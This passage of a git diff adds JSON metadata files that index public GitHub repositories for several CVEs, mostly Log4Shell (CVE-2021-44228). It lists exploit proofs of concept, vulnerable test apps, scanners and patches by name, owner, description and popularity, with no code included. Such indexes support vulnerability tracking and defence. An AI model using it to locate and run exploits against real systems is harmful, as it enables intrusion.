+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 475582400,
+ "name": "CVE-2021-44142",
+ "full_name": "horizon3ai\/CVE-2021-44142",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-44142",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-29T19:03:38Z",
+ "updated_at": "2024-06-05T16:36:44Z",
+ "pushed_at": "2022-03-29T20:47:13Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 484298524,
+ "name": "CVE-2021-44142",
+ "full_name": "gudyrmik\/CVE-2021-44142",
+ "owner": {
+ "login": "gudyrmik",
+ "id": 60119377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60119377?v=4",
+ "html_url": "https:\/\/github.com\/gudyrmik"
+ },
+ "html_url": "https:\/\/github.com\/gudyrmik\/CVE-2021-44142",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T04:46:54Z",
+ "updated_at": "2022-04-27T07:32:26Z",
+ "pushed_at": "2022-04-25T01:02:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44168.json b/2021/CVE-2021-44168.json
new file mode 100644
index 0000000000..b1acf66d3c
--- /dev/null
+++ b/2021/CVE-2021-44168.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 598975692,
+ "name": "CVE-2021-44168",
+ "full_name": "0xhaggis\/CVE-2021-44168",
+ "owner": {
+ "login": "0xhaggis",
+ "id": 6735009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4",
+ "html_url": "https:\/\/github.com\/0xhaggis"
+ },
+ "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-44168",
+ "description": "A download of code without integrity check vulnerability in the \"execute restore src-vis\" command of FortiOS before 7.0.3.",
+ "fork": false,
+ "created_at": "2023-02-08T07:30:52Z",
+ "updated_at": "2024-06-05T15:28:26Z",
+ "pushed_at": "2023-10-18T17:15:55Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44217.json b/2021/CVE-2021-44217.json
new file mode 100644
index 0000000000..ec86776117
--- /dev/null
+++ b/2021/CVE-2021-44217.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 431676694,
+ "name": "CVE-2021-44217",
+ "full_name": "Hyperkopite\/CVE-2021-44217",
+ "owner": {
+ "login": "Hyperkopite",
+ "id": 9525971,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9525971?v=4",
+ "html_url": "https:\/\/github.com\/Hyperkopite"
+ },
+ "html_url": "https:\/\/github.com\/Hyperkopite\/CVE-2021-44217",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-25T01:24:58Z",
+ "updated_at": "2021-11-25T05:02:36Z",
+ "pushed_at": "2022-02-26T18:38:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44228.json b/2021/CVE-2021-44228.json
new file mode 100644
index 0000000000..249ad56c6f
--- /dev/null
+++ b/2021/CVE-2021-44228.json
@@ -0,0 +1,12667 @@
+[
+ {
+ "id": 436666301,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce",
+ "full_name": "tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce",
+ "owner": {
+ "login": "tangxiaofeng7",
+ "id": 45926593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4",
+ "html_url": "https:\/\/github.com\/tangxiaofeng7"
+ },
+ "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce",
+ "description": "Apache Log4j 远程代码执行",
+ "fork": false,
+ "created_at": "2021-12-09T15:27:38Z",
+ "updated_at": "2024-06-11T11:41:05Z",
+ "pushed_at": "2023-05-14T04:54:32Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 436771097,
+ "name": "Healer",
+ "full_name": "Glease\/Healer",
+ "owner": {
+ "login": "Glease",
+ "id": 4586901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4586901?v=4",
+ "html_url": "https:\/\/github.com\/Glease"
+ },
+ "html_url": "https:\/\/github.com\/Glease\/Healer",
+ "description": "Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2",
+ "fork": false,
+ "created_at": "2021-12-09T21:49:33Z",
+ "updated_at": "2024-05-01T13:07:39Z",
+ "pushed_at": "2023-01-27T17:34:36Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 436798675,
+ "name": "L4J-Vuln-Patch",
+ "full_name": "jacobtread\/L4J-Vuln-Patch",
+ "owner": {
+ "login": "jacobtread",
+ "id": 33708767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33708767?v=4",
+ "html_url": "https:\/\/github.com\/jacobtread"
+ },
+ "html_url": "https:\/\/github.com\/jacobtread\/L4J-Vuln-Patch",
+ "description": "This tool patches the CVE-2021-44228 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN after downloading or updating versions of minecraft as its not a perminent patch",
+ "fork": false,
+ "created_at": "2021-12-10T00:14:06Z",
+ "updated_at": "2023-08-17T23:00:04Z",
+ "pushed_at": "2021-12-15T03:10:47Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436860437,
+ "name": "Log4j2-CVE-2021-44228",
+ "full_name": "jas502n\/Log4j2-CVE-2021-44228",
+ "owner": {
+ "login": "jas502n",
+ "id": 16593068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4",
+ "html_url": "https:\/\/github.com\/jas502n"
+ },
+ "html_url": "https:\/\/github.com\/jas502n\/Log4j2-CVE-2021-44228",
+ "description": "Remote Code Injection In Log4j",
+ "fork": false,
+ "created_at": "2021-12-10T05:23:44Z",
+ "updated_at": "2024-06-11T12:49:16Z",
+ "pushed_at": "2022-01-18T12:01:52Z",
+ "stargazers_count": 454,
+ "watchers_count": 454,
+ "has_discussions": false,
+ "forks_count": 127,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 127,
+ "watchers": 454,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 436871682,
+ "name": "Log4J-RCE-Proof-Of-Concept",
+ "full_name": "HyCraftHD\/Log4J-RCE-Proof-Of-Concept",
+ "owner": {
+ "login": "HyCraftHD",
+ "id": 7681220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7681220?v=4",
+ "html_url": "https:\/\/github.com\/HyCraftHD"
+ },
+ "html_url": "https:\/\/github.com\/HyCraftHD\/Log4J-RCE-Proof-Of-Concept",
+ "description": "Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information",
+ "fork": false,
+ "created_at": "2021-12-10T06:15:38Z",
+ "updated_at": "2024-06-02T15:23:49Z",
+ "pushed_at": "2021-12-16T01:33:48Z",
+ "stargazers_count": 180,
+ "watchers_count": 180,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-44228",
+ "cves",
+ "exploit",
+ "log4j",
+ "log4j2",
+ "minecraft"
+ ],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 180,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 436877979,
+ "name": "cloudrasp-log4j2",
+ "full_name": "boundaryx\/cloudrasp-log4j2",
+ "owner": {
+ "login": "boundaryx",
+ "id": 95878655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95878655?v=4",
+ "html_url": "https:\/\/github.com\/boundaryx"
+ },
+ "html_url": "https:\/\/github.com\/boundaryx\/cloudrasp-log4j2",
+ "description": "一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.",
+ "fork": false,
+ "created_at": "2021-12-10T06:42:37Z",
+ "updated_at": "2024-05-28T01:33:56Z",
+ "pushed_at": "2021-12-11T02:49:41Z",
+ "stargazers_count": 119,
+ "watchers_count": 119,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "defense",
+ "hardening",
+ "java",
+ "log4j",
+ "log4j2",
+ "protection",
+ "rasp",
+ "rce",
+ "security",
+ "security-tools",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 119,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 436881928,
+ "name": "CVE-2021-44228",
+ "full_name": "dbgee\/CVE-2021-44228",
+ "owner": {
+ "login": "dbgee",
+ "id": 46910972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4",
+ "html_url": "https:\/\/github.com\/dbgee"
+ },
+ "html_url": "https:\/\/github.com\/dbgee\/CVE-2021-44228",
+ "description": "Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser.",
+ "fork": false,
+ "created_at": "2021-12-10T06:59:10Z",
+ "updated_at": "2022-11-09T18:14:39Z",
+ "pushed_at": "2022-01-19T09:58:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436918458,
+ "name": "Log4jPatcher",
+ "full_name": "CreeperHost\/Log4jPatcher",
+ "owner": {
+ "login": "CreeperHost",
+ "id": 7502613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7502613?v=4",
+ "html_url": "https:\/\/github.com\/CreeperHost"
+ },
+ "html_url": "https:\/\/github.com\/CreeperHost\/Log4jPatcher",
+ "description": "A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)",
+ "fork": false,
+ "created_at": "2021-12-10T09:16:46Z",
+ "updated_at": "2024-06-20T21:01:22Z",
+ "pushed_at": "2022-11-10T11:16:17Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4j2",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 436919597,
+ "name": "RCE",
+ "full_name": "DragonSurvivalEU\/RCE",
+ "owner": {
+ "login": "DragonSurvivalEU",
+ "id": 92676019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92676019?v=4",
+ "html_url": "https:\/\/github.com\/DragonSurvivalEU"
+ },
+ "html_url": "https:\/\/github.com\/DragonSurvivalEU\/RCE",
+ "description": "CVE-2021-44228 fix",
+ "fork": false,
+ "created_at": "2021-12-10T09:20:40Z",
+ "updated_at": "2023-09-28T11:33:56Z",
+ "pushed_at": "2021-12-20T00:38:10Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436933689,
+ "name": "Log4jPatch",
+ "full_name": "simonis\/Log4jPatch",
+ "owner": {
+ "login": "simonis",
+ "id": 3178197,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3178197?v=4",
+ "html_url": "https:\/\/github.com\/simonis"
+ },
+ "html_url": "https:\/\/github.com\/simonis\/Log4jPatch",
+ "description": "Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process",
+ "fork": false,
+ "created_at": "2021-12-10T10:10:19Z",
+ "updated_at": "2024-06-06T03:59:54Z",
+ "pushed_at": "2021-12-12T10:33:02Z",
+ "stargazers_count": 108,
+ "watchers_count": 108,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 108,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 436973468,
+ "name": "CVE-2021-44228-Test-Server",
+ "full_name": "zlepper\/CVE-2021-44228-Test-Server",
+ "owner": {
+ "login": "zlepper",
+ "id": 1499810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1499810?v=4",
+ "html_url": "https:\/\/github.com\/zlepper"
+ },
+ "html_url": "https:\/\/github.com\/zlepper\/CVE-2021-44228-Test-Server",
+ "description": "A small server for verifing if a given java program is succeptibel to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-10T12:35:30Z",
+ "updated_at": "2023-08-04T05:22:46Z",
+ "pushed_at": "2021-12-10T12:39:25Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 436974241,
+ "name": "log4shell-vulnerable-app",
+ "full_name": "christophetd\/log4shell-vulnerable-app",
+ "owner": {
+ "login": "christophetd",
+ "id": 136675,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136675?v=4",
+ "html_url": "https:\/\/github.com\/christophetd"
+ },
+ "html_url": "https:\/\/github.com\/christophetd\/log4shell-vulnerable-app",
+ "description": "Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2021-12-10T12:38:20Z",
+ "updated_at": "2024-06-24T01:59:33Z",
+ "pushed_at": "2024-04-26T03:16:26Z",
+ "stargazers_count": 1100,
+ "watchers_count": 1100,
+ "has_discussions": false,
+ "forks_count": 528,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 528,
+ "watchers": 1100,
+ "score": 0,
+ "subscribers_count": 23
+ },
+ {
+ "id": 437005376,
+ "name": "log4jcheck",
+ "full_name": "NorthwaveSecurity\/log4jcheck",
+ "owner": {
+ "login": "NorthwaveSecurity",
+ "id": 44571169,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44571169?v=4",
+ "html_url": "https:\/\/github.com\/NorthwaveSecurity"
+ },
+ "html_url": "https:\/\/github.com\/NorthwaveSecurity\/log4jcheck",
+ "description": "A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers.",
+ "fork": false,
+ "created_at": "2021-12-10T14:22:49Z",
+ "updated_at": "2024-05-26T16:10:24Z",
+ "pushed_at": "2021-12-14T15:16:15Z",
+ "stargazers_count": 126,
+ "watchers_count": 126,
+ "has_discussions": false,
+ "forks_count": 26,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checker",
+ "cve-2021-44228",
+ "log4j",
+ "log4shell",
+ "rce",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 26,
+ "watchers": 126,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 437026730,
+ "name": "VictimApp",
+ "full_name": "nkoneko\/VictimApp",
+ "owner": {
+ "login": "nkoneko",
+ "id": 1922341,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1922341?v=4",
+ "html_url": "https:\/\/github.com\/nkoneko"
+ },
+ "html_url": "https:\/\/github.com\/nkoneko\/VictimApp",
+ "description": "Vulnerable to CVE-2021-44228. trustURLCodebase is not required.",
+ "fork": false,
+ "created_at": "2021-12-10T15:32:03Z",
+ "updated_at": "2022-11-09T18:14:41Z",
+ "pushed_at": "2021-12-10T22:40:15Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437031223,
+ "name": "pulsar-docker-images-patch-CVE-2021-44228",
+ "full_name": "lhotari\/pulsar-docker-images-patch-CVE-2021-44228",
+ "owner": {
+ "login": "lhotari",
+ "id": 66864,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864?v=4",
+ "html_url": "https:\/\/github.com\/lhotari"
+ },
+ "html_url": "https:\/\/github.com\/lhotari\/pulsar-docker-images-patch-CVE-2021-44228",
+ "description": "Patch Pulsar Docker images with Log4J 2.17.1 update to mitigate Apache Log4J Security Vulnerabilities including Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-10T15:46:49Z",
+ "updated_at": "2022-03-18T12:16:50Z",
+ "pushed_at": "2022-01-13T06:40:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "docker",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437034295,
+ "name": "Apache-Log4j2-RCE",
+ "full_name": "1in9e\/Apache-Log4j2-RCE",
+ "owner": {
+ "login": "1in9e",
+ "id": 15817052,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15817052?v=4",
+ "html_url": "https:\/\/github.com\/1in9e"
+ },
+ "html_url": "https:\/\/github.com\/1in9e\/Apache-Log4j2-RCE",
+ "description": "Apache Log4j2 RCE( CVE-2021-44228)验证环境",
+ "fork": false,
+ "created_at": "2021-12-10T15:57:14Z",
+ "updated_at": "2023-09-28T11:33:56Z",
+ "pushed_at": "2021-12-10T15:58:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "bugbounty",
+ "cve-2021-44228",
+ "java",
+ "log4j2",
+ "rce",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437056774,
+ "name": "CVE-2021-44228-example",
+ "full_name": "KosmX\/CVE-2021-44228-example",
+ "owner": {
+ "login": "KosmX",
+ "id": 15692868,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15692868?v=4",
+ "html_url": "https:\/\/github.com\/KosmX"
+ },
+ "html_url": "https:\/\/github.com\/KosmX\/CVE-2021-44228-example",
+ "description": "vulnerability POC",
+ "fork": false,
+ "created_at": "2021-12-10T17:13:18Z",
+ "updated_at": "2023-08-15T12:50:54Z",
+ "pushed_at": "2021-12-17T17:16:30Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-44228",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437060009,
+ "name": "CVE-2021-44228",
+ "full_name": "greymd\/CVE-2021-44228",
+ "owner": {
+ "login": "greymd",
+ "id": 3874767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3874767?v=4",
+ "html_url": "https:\/\/github.com\/greymd"
+ },
+ "html_url": "https:\/\/github.com\/greymd\/CVE-2021-44228",
+ "description": "Vulnerability CVE-2021-44228 checker",
+ "fork": false,
+ "created_at": "2021-12-10T17:24:47Z",
+ "updated_at": "2023-09-28T11:33:56Z",
+ "pushed_at": "2021-12-13T15:16:23Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437071396,
+ "name": "CVE-2021-44228-Log4Shell-Hashes",
+ "full_name": "mubix\/CVE-2021-44228-Log4Shell-Hashes",
+ "owner": {
+ "login": "mubix",
+ "id": 679319,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/679319?v=4",
+ "html_url": "https:\/\/github.com\/mubix"
+ },
+ "html_url": "https:\/\/github.com\/mubix\/CVE-2021-44228-Log4Shell-Hashes",
+ "description": "Hashes for vulnerable LOG4J versions",
+ "fork": false,
+ "created_at": "2021-12-10T18:06:06Z",
+ "updated_at": "2024-05-12T04:20:47Z",
+ "pushed_at": "2021-12-17T17:02:24Z",
+ "stargazers_count": 155,
+ "watchers_count": 155,
+ "has_discussions": false,
+ "forks_count": 38,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 38,
+ "watchers": 155,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 437091396,
+ "name": "mc-log4j-patcher",
+ "full_name": "OopsieWoopsie\/mc-log4j-patcher",
+ "owner": {
+ "login": "OopsieWoopsie",
+ "id": 15069175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15069175?v=4",
+ "html_url": "https:\/\/github.com\/OopsieWoopsie"
+ },
+ "html_url": "https:\/\/github.com\/OopsieWoopsie\/mc-log4j-patcher",
+ "description": "CVE-2021-44228 server-side fix for minecraft servers.",
+ "fork": false,
+ "created_at": "2021-12-10T19:25:31Z",
+ "updated_at": "2023-11-08T22:32:59Z",
+ "pushed_at": "2021-12-10T19:47:45Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "fix",
+ "log4j2",
+ "minecraft",
+ "paper",
+ "spigot"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437097787,
+ "name": "CVE-2021-44228-kusto",
+ "full_name": "wheez-y\/CVE-2021-44228-kusto",
+ "owner": {
+ "login": "wheez-y",
+ "id": 77060088,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77060088?v=4",
+ "html_url": "https:\/\/github.com\/wheez-y"
+ },
+ "html_url": "https:\/\/github.com\/wheez-y\/CVE-2021-44228-kusto",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-10T19:53:32Z",
+ "updated_at": "2021-12-10T19:55:16Z",
+ "pushed_at": "2021-12-10T19:55:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437108119,
+ "name": "log4shell-mitigation",
+ "full_name": "izzyacademy\/log4shell-mitigation",
+ "owner": {
+ "login": "izzyacademy",
+ "id": 44282278,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44282278?v=4",
+ "html_url": "https:\/\/github.com\/izzyacademy"
+ },
+ "html_url": "https:\/\/github.com\/izzyacademy\/log4shell-mitigation",
+ "description": "Mitigation for Log4Shell Security Vulnerability CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2021-12-10T20:39:56Z",
+ "updated_at": "2021-12-11T16:21:03Z",
+ "pushed_at": "2021-12-11T16:21:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437115624,
+ "name": "CVE-2021-44228-poc",
+ "full_name": "0xst4n\/CVE-2021-44228-poc",
+ "owner": {
+ "login": "0xst4n",
+ "id": 17493969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17493969?v=4",
+ "html_url": "https:\/\/github.com\/0xst4n"
+ },
+ "html_url": "https:\/\/github.com\/0xst4n\/CVE-2021-44228-poc",
+ "description": "log4shell sample application (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-10T21:13:46Z",
+ "updated_at": "2021-12-26T17:22:36Z",
+ "pushed_at": "2021-12-10T21:15:23Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437122153,
+ "name": "log4j-detect",
+ "full_name": "takito1812\/log4j-detect",
+ "owner": {
+ "login": "takito1812",
+ "id": 56491288,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56491288?v=4",
+ "html_url": "https:\/\/github.com\/takito1812"
+ },
+ "html_url": "https:\/\/github.com\/takito1812\/log4j-detect",
+ "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading",
+ "fork": false,
+ "created_at": "2021-12-10T21:46:18Z",
+ "updated_at": "2024-05-26T16:14:44Z",
+ "pushed_at": "2021-12-13T22:27:25Z",
+ "stargazers_count": 193,
+ "watchers_count": 193,
+ "has_discussions": false,
+ "forks_count": 59,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 59,
+ "watchers": 193,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 437124793,
+ "name": "log4noshell",
+ "full_name": "winnpixie\/log4noshell",
+ "owner": {
+ "login": "winnpixie",
+ "id": 31022473,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31022473?v=4",
+ "html_url": "https:\/\/github.com\/winnpixie"
+ },
+ "html_url": "https:\/\/github.com\/winnpixie\/log4noshell",
+ "description": "A Java Agent that disables Apache Log4J's JNDI Lookup to mitigate CVE-2021-44228 (\"Log4Shell\").",
+ "fork": false,
+ "created_at": "2021-12-10T21:59:31Z",
+ "updated_at": "2024-05-25T10:03:05Z",
+ "pushed_at": "2024-05-15T11:27:40Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "log4j",
+ "patch",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437128632,
+ "name": "CVE-2021-44228-DFIR-Notes",
